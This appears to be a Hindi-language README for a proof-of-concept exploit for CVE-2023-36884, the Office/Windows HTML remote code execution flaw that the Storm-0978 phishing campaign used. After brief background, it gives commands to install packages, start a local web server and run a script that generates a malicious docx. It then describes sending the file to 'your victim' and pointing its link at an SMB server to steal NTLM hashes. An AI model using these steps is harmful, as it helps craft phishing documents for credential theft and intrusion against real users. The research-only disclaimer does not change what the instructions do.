
MS Office और Windows HTML RCE (CVE-2023-36884) - PoC और exploit
11 जुलाई 2023 को, माइक्रोसॉफ्ट ने कई सक्रिय रूप से शोषित रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरियों को संबोधित करने के उद्देश्य से एक पैच जारी किया। इस कार्रवाई ने स्टॉर्म-0978 नामक एक खतरनाक अभिनेता द्वारा आयोजित एक फ़िशिंग अभियान पर भी प्रकाश डाला, जो विशेष रूप से यूरोप और उत्तरी अमेरिका में संगठनों को लक्षित कर रहा था। इस अभियान के केंद्र में CVE-2023-36884 नामक एक शून्य-दिवसीय कमजोरी थी, जिसने हमलावर को यूक्रेन विश्व कांग्रेस (UWC) से संबंधित भू-राजनीतिक लालच वाले सावधानीपूर्वक तैयार किए गए Office Open eXtensible Markup Language (OOXML) दस्तावेज़ों के माध्यम से विंडोज सर्च फाइलों का शोषण करने की अनुमति दी। हालांकि शुरू में इस कमजोरी को कम करने के लिए एक वर्कअराउंड प्रस्तावित किया गया था, माइक्रोसॉफ्ट ने 8 अगस्त 2023 को एक Office Defence in Depth अपडेट जारी किया, जिसने प्रभावी रूप से विंडोज सर्च (*.search-ms) फाइलों के माध्यम से RCE की ओर ले जाने वाली शोषण श्रृंखला को तोड़ दिया।
यह शोषण स्क्रिप्ट vsociety पर CVE विश्लेषण के लिए लिखी गई है।
PIP पैकेज स्थापित करें:
pip install python-docx pywin32
एक example.html फ़ाइल बनाएँ और एक Python HTTP वेब सर्वर शुरू करें:
New-Item -Path "example.html" - ItemType File
python -m http.server 8888
फिर, स्क्रिप्ट चलाएँ:
python gen_docx_with_rtf_altchunk.py merged.docx autolinked.rtf http://localhost:8888/example.html
अब उत्पन्न फ़ाइल आपके पीड़ित के साथ ईमेल या किसी अन्य माध्यम से साझा की जा सकती है। लिंक आपके SMB सर्वर को संदर्भित कर सकता है ताकि पीड़ित का NTLM हैश चुराया जा सके, या एक HTML फ़ाइल को जिसमें एक iframe होता है जो मूल मैलवेयर की तरह विंडोज सर्च फ़ाइल का संदर्भ देता है। आगे की जानकारी की कमी के कारण, सटीक शोषण नहीं दिखाया जा सकता।
यह शोषण स्क्रिप्ट विशेष रूप से अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाई गई है। इसका इरादा किसी भी दुर्भावनापूर्ण या अनधिकृत गतिविधियों के लिए उपयोग करने का नहीं है। स्क्रिप्ट के लेखक और स्वामी इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी या दायित्व अस्वीकार करते हैं। उपयोगकर्ताओं से आग्रह किया जाता है कि वे इस सॉफ़्टवेयर का जिम्मेदारी से और केवल लागू कानूनों और विनियमों के अनुसार उपयोग करें। जिम्मेदारी से उपयोग करें।